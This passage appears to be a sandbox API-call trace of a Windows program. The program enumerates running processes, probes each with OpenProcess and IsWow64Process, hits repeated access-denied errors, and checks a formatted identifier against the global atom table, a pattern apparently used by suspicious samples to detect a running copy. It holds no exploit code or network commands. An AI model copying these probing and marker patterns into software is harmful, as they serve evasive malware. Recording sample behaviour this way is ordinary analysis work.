	[0097.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.569] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.569] CloseHandle (hObject=0x248) returned 1
	[0097.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658d48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.570] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.570] CloseHandle (hObject=0x248) returned 1
	[0097.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658ea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.571] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.571] CloseHandle (hObject=0x248) returned 1
	[0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.571] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.571] CloseHandle (hObject=0x248) returned 1
	[0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.571] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.571] CloseHandle (hObject=0x248) returned 1
	[0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.571] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.571] CloseHandle (hObject=0x248) returned 1
	[0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658e08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.572] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.572] CloseHandle (hObject=0x248) returned 1
	[0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.572] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.572] CloseHandle (hObject=0x248) returned 1
	[0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.573] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.573] CloseHandle (hObject=0x248) returned 1
	[0097.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.573] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.573] CloseHandle (hObject=0x248) returned 1
	[0097.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.573] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.573] CloseHandle (hObject=0x248) returned 1
	[0097.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.574] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.574] CloseHandle (hObject=0x248) returned 1
	[0097.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658ea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.574] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.574] CloseHandle (hObject=0x248) returned 1
	[0097.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65acc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.574] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.574] CloseHandle (hObject=0x248) returned 1
	[0097.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.575] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.575] CloseHandle (hObject=0x248) returned 1
	[0097.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x6589c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.575] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.575] CloseHandle (hObject=0x248) returned 1
	[0097.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.575] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.575] CloseHandle (hObject=0x248) returned 1
	[0097.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.575] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.576] CloseHandle (hObject=0x248) returned 1
	[0097.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.576] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.576] CloseHandle (hObject=0x248) returned 1
	[0097.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658d88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.576] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.576] CloseHandle (hObject=0x248) returned 1
	[0097.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.576] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.577] CloseHandle (hObject=0x248) returned 1
	[0097.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.577] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.577] CloseHandle (hObject=0x248) returned 1
	[0097.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.577] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.577] CloseHandle (hObject=0x248) returned 1
	[0097.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.577] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.577] CloseHandle (hObject=0x248) returned 1
	[0097.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.578] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.578] CloseHandle (hObject=0x248) returned 1
	[0097.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.578] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.578] CloseHandle (hObject=0x248) returned 1
	[0097.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.578] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.578] CloseHandle (hObject=0x248) returned 1
	[0097.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.579] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.579] CloseHandle (hObject=0x248) returned 1
	[0097.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.579] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.579] CloseHandle (hObject=0x248) returned 1
	[0097.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.579] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.579] CloseHandle (hObject=0x248) returned 1
	[0097.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658920, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.580] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.580] CloseHandle (hObject=0x248) returned 1
	[0097.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.580] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.581] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.581] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.581] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.582] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.583] GetLastError () returned 0x5
	[0097.584] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.584] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.584] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.584] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.584] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.584] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.584] CloseHandle (hObject=0x248) returned 1
	[0097.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
